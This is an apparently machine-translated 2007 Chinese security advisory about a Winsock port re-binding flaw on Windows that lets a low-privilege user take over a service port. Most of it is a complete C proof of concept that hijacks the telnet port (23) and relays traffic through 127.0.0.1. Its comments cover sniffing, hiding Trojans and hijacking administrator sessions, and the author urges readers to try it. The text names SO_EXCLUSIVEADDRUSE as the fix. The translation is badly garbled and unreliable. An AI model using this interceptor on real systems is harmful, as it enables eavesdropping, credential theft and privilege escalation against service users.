Port interception with port hidden sniffing attacks-vulnerability warning-the black bar safety net

2007-01-13T00:00:00
ID MYHACK58:62200713739
Type myhack58
Reporter 佚名
Modified 2007-01-13T00:00:00

Description

In WINDOWS SOCKET Server Application Programming, the following statement perhaps than than are:

s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); saddr. sin_family = AF_INET; saddr. sin_addr. server_address = htonl(INADDR_ANY); bind(s,(SOCKADDR *)&saddr,sizeof(saddr));

In fact, this which exists in a very big security risk, because in the winsock implementation, for the server binding can be multi-bound, in determining multiple binding using who, according to a principle who is designated most clearly the package to submit to WHO, and no permission, that is a lower privileged user can be re-bound in the advanced permissions, such as service start on port,which is very significant of a security risk.

What does this mean? Means that you can make the following attack:

To 1. A Trojan horse is bound to an already legally exists in the ports on the port hide, through his own particular packet format determination is not their own packet, if it is your own process, if not by 1 2 7. 0. 0. 1 address to the real server application for processing.

2。 A Trojan can be in a low-rights user on the bind higher authority of the service application Port, to carry out the processing information of the sniffing, was on a host listening on a SOCKET of the communication need to have the very high privilege required, but in fact the use of SOCKET re-binding, you can easily monitor have this kind of SOCKET programming vulnerabilities of the communication, without the use of what the hook, the hook or low-level drive technology, these need to have administrator privileges to reach)

  1. the For some special applications, you can initiate a middleman attack, from low privilege users on access to information or the fact that deception, as in the guest permissions to intercept telnet Server 2 3 port, if it is using NTLM encryption and authentication, although you can't by sniffing directly get the password, but once there the admin user through your log later, your application can initiate a middleman attack, play this logged in user through the SOCKET to send a high-privilege command, the arrival of the invasion's purpose.

  2. For the construction of theWEB server, the intruder just need to get lower permissions, it can fully meet the changed web page object, very simple, to play your server give the connection request to the other information in the response, and even e-Commerce based on deception, to obtain illegal data.

In fact, MS themselves of the many services SOCKET programming there are such problems, telnet,ftp,http service implementation are all can use this method to attack, in a low-rights user on the implementation of the SYSTEM application on the intercept to listen to. Include W2K+SP3 IIS are the same, so if you have a low permission user virus or Trojan infection, and the other also opens up these services, then it may wish to a try. And I reckon there are many third-party services also most of the existence of this vulnerability.

The solution is simple in writing as described above the application when the binding before the need to use setsockopt to specify SO_EXCLUSIVEADDRUSE requires exclusive all of the port address, but does not allow reuse. So that other people cannot reuse this port.

The following is a simple interception of the ms telnet Server example, the GUEST user can successfully be intercepted, the remaining is to everyone according to their needs, some special cut of the problem: in the case of hidden, Sniffer data, high-privilege users to spoofing and the like.

The following is the code snippet:

|

include

include

include

include

DWORD WINAPI ClientThread(LPVOID lpParam);

int main() { WORD wVersionRequested; DWORD ret; WSADATA wsaData; BOOL val; SOCKADDR_IN saddr; SOCKADDR_IN scaddr; int err; SOCKET s; SOCKET sc; int caddsize; HANDLE mt; DWORD tid;

wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { printf("error! WSAStartup failed!\ n"); return -1; } saddr. sin_family = AF_INET; //Intercept, although you can also the address is specified as INADDR_ANY, but you can affect the normal application case, Should specify a specific IP, left 1 2 7. 0. 0. 1 to the normal service application, and then use this address for forwarding, It may not affect other normal applications. saddr. sin_addr. server_address = inet_addr("192.168.0.60"); saddr. sin_port = htons(2 3); if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) { printf("error! socket failed!\ n"); return -1; } val = TRUE; //SO_REUSEADDR option is that you can achieve the port re-binding of if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char )&val,sizeof(val))!= 0) { printf("error! setsockopt failed!\ n"); return -1; } //If you specify SO_EXCLUSIVEADDRUSE, it will not bind is successful, return a permission error code; //If it is figured heavy use of the port reach the hidden object, the You can dynamically test the current has been bound to a port which can be successful, It is with this vulnerability, then the dynamic use of port so that more covert //In fact, the UDP port as much as you can so re-binding the use here is mainly based on the TELNET service as an example to attack if(bind(s,(SOCKADDR )&saddr,sizeof(saddr))==SOCKET_ERROR) { ret=GetLastError(); printf("error! bind failed!\ n"); return -1; } listen(s,2); while(1) { caddsize = sizeof(scaddr); //Accept the connection request sc = accept(s,(struct sockaddr *)&scaddr,&caddsize); if(sc!= INVALID_SOCKET) { mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid); if(mt==NULL) { printf("Thread Creat Failed!\ n"); break; } } CloseHandle(mt); } closesocket(s); WSACleanup(); return 0; }

DWORD WINAPI ClientThread(LPVOID lpParam) { SOCKET ss = (SOCKET)lpParam; SOCKET sc; unsigned char buf[4 0 9 6]; SOCKADDR_IN saddr; long num; DWORD val; DWORD ret; //If is port hidden application, it can be here plus some of the judging //If it is your own package, you can perform some special processing, not word by 1 2 7. 0. 0. 1 for forwarding

saddr. sin_family = AF_INET; saddr. sin_addr. server_address = inet_addr("127.0.0.1"); saddr. sin_port = htons(2 3); if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR) { printf("error! socket failed!\ n"); return -1; } val = 1 0 0; if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char )&val,sizeof(val))!= 0) { ret = GetLastError(); return -1; } if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char )&val,sizeof(val))!= 0) { ret = GetLastError(); return -1; } if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!= 0) { printf("error! socket connect failed!\ n"); closesocket(sc); closesocket(ss); return -1; } while(1) { //The following code is mainly achieved through 1 2 to 7. To 0. To 0. 1 This address, the packet is forwarded to the real application, And the response packet is then forwarded back. //If it is sniffing the content, it can then here are content analysis and recording //If it is attacks such as the TELNET server, using its high-privilege login user while You can analyze which landing of the user, and then use the Send a specific packet to hijack the user's identity to perform. num = recv(ss,buf,4 0 9 6,0); if(num>0) send(sc,buf,num,0); else if(num==0) break; num = recv(sc,buf,4 0 9 6,0); if(num>0) send(ss,buf,num,0); else if(num==0) break; } closesocket(ss); closesocket(sc); return 0 ; }